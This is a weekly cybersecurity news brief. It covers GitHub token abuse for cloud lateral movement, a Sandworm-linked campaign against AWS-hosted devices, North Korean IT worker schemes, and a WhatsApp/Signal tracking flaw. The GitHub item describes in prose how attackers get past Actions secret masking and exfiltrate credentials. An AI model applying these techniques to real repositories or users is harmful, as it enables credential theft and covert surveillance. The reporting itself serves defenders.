Brief #135: GitHub Enables Cross-Cloud Attacks, AI Agents Risk 76% of Orgs, Entry Salaries Drop 30%

Happy Sunday!

Here is what went down this week:

• GitHub token attacks are enabling attackers to move from compromised repositories directly into cloud environments, with most organizations storing cloud credentials in Action Secrets
• 83% of enterprises use AI but nearly half have little visibility into how these systems access their data, creating significant governance blind spots
• Entry-level cybersecurity jobs have become brutally competitive with salaries dropping 20-30% and Security+ certs no longer enough to land most positions

A quick note before we dive in.

A Quick note

Is Security Blocking Your Business?

Need a security leader on your team but don't need a full-time hire? Let's talk.

Book a Free Discovery Call

Industry News

GitHub PAT Attacks Enable Cross-Cloud Lateral Movement

• Attackers are leveraging compromised GitHub Personal Access Tokens to discover Action Secrets names through API code search, then creating malicious workflows to execute code and steal cloud credentials from organizations.

• Threat actors bypass GitHub's secret masking by encoding stolen credentials twice with Base64 or exfiltrating them to external webhook endpoints, allowing them to print raw secret values in Action logs for credential harvesting.

• The attack enables lateral movement from GitHub repositories directly into victim cloud environments, with 73% of organizations storing CSP credentials in GitHub Action Secrets and 45% keeping plaintext cloud keys in private repositories.

Amazon Confirms 5-Year Russian Cyberattack Campaign Targeting AWS Infrastructure

• Amazon threat intelligence has confirmed a Sandworm-linked Russian state-sponsored cyberattack campaign targeting AWS-hosted devices since 2021, focusing primarily on Western energy sector infrastructure in North America and Europe.

• The attacks exploit misconfigured customer network edge devices rather than unpatched vulnerabilities, with threat actors taking advantage of exposed management interfaces and overly permissive identities to maintain persistent access.

• Amazon's CSO separately disclosed blocking over 1,800 suspected North Korean IT workers since April 2024, who use stolen identities and laptop farms to secure remote positions and funnel earnings back to DPRK weapons programs.

Silent Whisper Vulnerability Allows Covert Tracking of WhatsApp and Signal Users

• Researchers disclosed a tracking technique that exploits delivery acknowledgments in WhatsApp and Signal, allowing attackers to monitor devices silently using only a phone number without triggering visible messages or notifications.

• The vulnerability causes significant battery drain during continuous probing, with test devices losing 14-18% battery per hour compared to normal 1% hourly consumption, while also consuming mobile data and disrupting bandwidth-heavy applications.

• A publicly available proof-of-concept tool enables probing at 50ms intervals to reveal daily routines, sleep schedules, and travel patterns through response time analysis, with the vulnerability remaining exploitable as of December 2025.